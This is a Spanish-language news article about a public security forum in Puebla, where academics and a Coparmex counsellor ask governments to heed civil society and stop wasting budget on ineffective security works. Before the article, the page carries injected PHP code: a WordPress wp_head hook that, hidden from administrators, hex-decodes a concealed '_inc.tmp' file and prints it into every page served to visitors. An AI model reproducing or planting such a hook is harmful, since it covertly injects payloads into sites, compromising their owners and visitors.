if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } En Foro de Seguridad Pública , piden que la sociedad civil sea tomada en cuenta – La Opinión Universitaria La Opinión Universitaria
Menu

En Foro de Seguridad Pública , piden que la sociedad civil sea tomada en cuenta

En el marco del Primer Foro sobre la Seguridad Pública en Puebla, académicos, empresarios y representantes de la sociedad civil hicieron un llamado a que la sociedad civil sea tomada en cuenta por los gobiernos quienes tienen la obligación de hacerlo sin importar distingo político.
Durante dicho evento que fue organizado por la Red de Seguridad Pública en Puebla, Fidencio Aguilar Víquez, académico de la Universidad Popular Autónoma del Estado de Puebla (UPAEP) comentó que a los gobiernos “les recordamos que México y Puebla se levantan de los golpes demoledores de las circunstancias cuando la sociedad civil se torna sensible”.
En este sentido, dijo que de cara al proceso electoral del 2018, y por lo que está sucediendo tras los sismos que se vivieron en días pasados, se ha visto que todos los niveles de gobierno están abandonando a la sociedad, “es la misma sociedad que se está dando cuenta quienes hagan madurar la democracia con concordia y con el cumplimiento de los estándares básicos para la sociedad del siglo XXI”.
Por su parte, Jorge Espina Reyes, consejero de Coparmex comentó que la exigencia ciudadana debe ir más allá, pues la sociedad ha superado a la clase política y tiene muchos valores que tendrá que sacar adelante para cambiar el estado de las cosas».
En este sentido, exigió que las autoridades dejen de gastar recursos sin ningún beneficio en un problema como la inseguridad, que se va agravando cada vez más.
Sobre este tema, indicó que «desde que los pusieron se multiplicaron los delitos en la zona, y era tal el pánico que ni los talacheros acudían a auxiliar a la gente, por lo tanto, es urgente que la sociedad deje de permitir que las autoridades malgasten el presupuesto en obras de utilería, como en el cine, que no resuelven los problemas».
Comentó que como sociedad no se puede seguir aceptando que las autoridades malgasten el presupuesto en algo que no va a redituar, “hay obras que cuestan recursos que son de utilería, que sirven para la escenografía pero no para resolver el problema”.

  • No comments

    Deja una respuesta

    Tweets recientes